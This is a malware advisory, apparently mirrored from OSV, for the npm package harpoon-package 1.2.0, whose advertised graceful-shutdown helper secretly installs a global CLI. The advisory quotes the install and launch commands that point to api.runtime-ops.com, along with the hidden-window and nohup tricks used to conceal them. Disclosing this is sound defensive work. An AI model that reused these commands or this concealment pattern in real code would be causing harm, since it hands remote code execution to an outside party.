harpoon-package @1.2.0
Vulnerability report · Last retrieved from osv.dev July 14, 2026 at 9:46 AM UTC
OSV ID
MAL-2026-10573
Ecosystem
npm
Summary
The exported registerGracefulShutdown() API — advertised in the README as a small server-helper for graceful shutdown, health, and tick profiling — unconditionally invokes an internal installRequiredPackages() routine that runs npm install -g rt-svc-9k2 ws msgpackr and then executes rtcli setup --api-base https://api.runtime-ops.com --download-key downloadky-fuji . The follow-on invocation is deliberately concealed: on Windows it is launched via powershell Start-Process -WindowStyle Hidden , and on Linux/macOS via nohup rtcli... > /dev/null 2>&1 & , detaching from the parent and suppressing output. Neither the global install nor the remote-controlled CLI execution is disclosed in the README. The effect is that any consumer application that calls the advertised graceful-shutdown API mutates global npm state on the host and hands arbitrary code execution to whoever controls api.runtime-ops.com via the third-party rt-svc-9k2 CLI driven by an author-supplied download key. The divergence between advertised purpose (shutdown handler) and actual behavior (global installer + hidden detached execution of a remote-driven CLI), combined with hidden-window/detached-execution wrappers, is characteristic of a covert install-time remote code execution channel smuggled into a plausibly named helper package.
Source: amazon-inspector (fc473ffcde7c9ffe6850429607ee9dd33a5cbd4cf30ad071f111693cef79045e)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.